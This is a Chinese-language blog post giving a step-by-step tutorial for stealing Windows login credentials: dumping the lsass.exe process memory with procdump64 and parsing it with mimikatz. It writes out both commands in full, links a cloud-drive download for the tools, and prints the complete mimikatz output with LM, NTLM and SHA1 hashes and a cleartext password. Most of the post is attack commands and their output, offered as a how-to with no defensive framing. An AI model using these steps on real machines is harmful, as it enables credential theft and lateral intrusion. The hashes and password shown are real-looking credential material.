mimakatz用法_两步完成利用procdump64+mimikatz获取win用户密码

使用procdump64+mimikatz可实现从内存中获取明文密码

工具

链接:https://pan.baidu.com/s/1gNc9qLcNSNBohIVrAiqShw 密码:fc38

首先得先获取到内存文件lsass.exe进程, 它用于本地安全和登陆策略,一般在进程管理器中能看到, 比如这样

1.导出lsass.exe

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

(注:必须使用管理员权限)

ProcDump v8.0 - Writes process dump files

Copyright (C) 2009-2016 Mark Russinovich

Sysinternals - www.sysinternals.com

With contributions from Andrew Richards

[15:33:26] Dump 1 initiated: C:\Users\chenglee\Desktop\Procdump\lsass.dmp

[15:33:28] Dump 1 writing: Estimated dump file size is 34 MB.

[15:33:28] Dump 1 complete: 34 MB written in 1.4 seconds

[15:33:28] Dump count reached.

2.执行mimikatz

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

(注:必须使用管理员权限)

ECHO 处于打开状态。

.#####. mimikatz 2.1.1 (x64) built on Jun 16 2018 18:49:05 - lil!

.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)

## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )

## \ / ## > http://blog.gentilkiwi.com/mimikatz

'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )

'#####' > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz(commandline) # sekurlsa::minidump lsass.dmp

Switch to MINIDUMP : 'lsass.dmp'

mimikatz(commandline) # sekurlsa::logonPasswords full

Opening : 'lsass.dmp' file for minidump...

Authentication Id : 0 ; 137859 (00000000:00021a83)

Session : Interactive from 1

User Name : chenglee

Domain : chenglee-PC

Logon Server : CHENGLEE-PC

Logon Time : 2018/7/25 15:06:35

SID : S-1-5-21-452281122-3045282507-3243563612-1000

msv :

[00000003] Primary

* Username : chenglee

* Domain : chenglee-PC

* LM : 9cffd5e7eefa14babacbf0b4adf55fde

* NTLM : 8d0f8e1a18236379538411a9056799f5

* SHA1 : 989281f47698b73e026160e842d86bc64c9e3c20

tspkg :

* Username : chenglee

* Domain : chenglee-PC

* Password : lizhenghua

wdigest :

* Username : chenglee

* Domain : chenglee-PC

* Password : lizhenghua

kerberos :

* Username : chenglee

* Domain : chenglee-PC

* Password : lizhenghua

ssp :

credman :

Authentication Id : 0 ; 137821 (00000000:00021a5d)

Session : Interactive from 1

User Name : chenglee

Domain : chenglee-PC

Logon Server : CHENGLEE-PC

Logon Time : 2018/7/25 15:06:35

SID : S-1-5-21-452281122-3045282507-3243563612-1000

msv :

[00000003] Primary

* Username : chenglee

* Domain : chenglee-PC

* LM : 9cffd5e7eefa14babacbf0b4adf55fde

* NTLM : 8d0f8e1a18236379538411a9056799f5

* SHA1 : 989281f47698b73e026160e842d86bc64c9e3c20

tspkg :

* Username : chenglee

* Domain : chenglee-PC

* Password : lizhenghua

wdigest :

* Username : chenglee

* Domain : chenglee-PC

* Password : lizhenghua

kerberos :

* Username : chenglee

* Domain : chenglee-PC

* Password : lizhenghua

ssp :

credman :

Authentication Id : 0 ; 997 (00000000:000003e5)

Session : Service from 0

User Name : LOCAL SERVICE

Domain : NT AUTHORITY

Logon Server : (null)

Logon Time : 2018/7/25 15:06:15

SID : S-1-5-19

msv :

tspkg :

wdigest :

* Username : (null)

* Domain : (null)

* Password : (null)

kerberos :

* Username : (null)

* Domain : (null)

* Password : (null)

ssp :

credman :

Authentication Id : 0 ; 996 (00000000:000003e4)

Session : Service from 0

User Name : CHENGLEE-PC$

Domain : WORKGROUP

Logon Server : (null)

Logon Time : 2018/7/25 15:06:15

SID : S-1-5-20

msv :

tspkg :

wdigest :

* Username : CHENGLEE-PC$

* Domain : WORKGROUP

* Password : (null)

kerberos :

* Username : chenglee-pc$

* Domain : WORKGROUP

* Password : (null)

ssp :

credman :

Authentication Id : 0 ; 48630 (00000000:0000bdf6)

Session : UndefinedLogonType from 0

User Name : (null)

Domain : (null)

Logon Server : (null)

Logon Time : 2018/7/25 15:06:06

SID :

msv :

tspkg :

wdigest :

kerberos :

ssp :

credman :

Authentication Id : 0 ; 999 (00000000:000003e7)

Session : UndefinedLogonType from 0

User Name : CHENGLEE-PC$

Domain : WORKGROUP

Logon Server : (null)

Logon Time : 2018/7/25 15:06:05

SID : S-1-5-18

msv :

tspkg :

wdigest :

* Username : CHENGLEE-PC$

* Domain : WORKGROUP

* Password : (null)

kerberos :

* Username : chenglee-pc$

* Domain : WORKGROUP

* Password : (null)

ssp :

credman :

mimikatz(commandline) # exit

Bye!

看, 密码[lizhenghua]处于明文暴露状态.

如果不是使用管理员模式运行cmd会报错,

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
提供的源码资源涵盖了安卓应用、小程序、Python应用和Java应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编写,确保了在对应环境下能够无缝运行。同时,源码中配备了详细的注释和文档,帮助用户快速理解代码结构和实现逻辑。 适用人群: 这些源码资源特别适合大学生群体。无论你是计算机相关专业的学生,还是对其他领域编程感兴趣的学生,这些资源都能为你提供宝贵的学习和实践机会。通过学习和运行这些源码,你可以掌握各平台开发的基础知识,提升编程能力和项目实战经验。 使用场景及目标: 在学习阶段,你可以利用这些源码资源进行课程实践、课外项目或毕业设计。通过分析和运行源码,你将深入了解各平台开发的技术细节和最佳实践,逐步培养起自己的项目开发和问题解决能力。此外,在求职或创业过程中,具备跨平台开发能力的大学生将更具竞争力。 其他说明: 为了确保源码资源的可运行性和易用性,特别注意了以下几点:首先,每份源码都提供了详细的运行环境和依赖说明,确保用户能够轻松搭建起开发环境;其次,源码中的注释和文档都非常完善,方便用户快速上手和理解代码;最后,我会定期更新这些源码资源,以适应各平台技术的最新发展和市场需求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值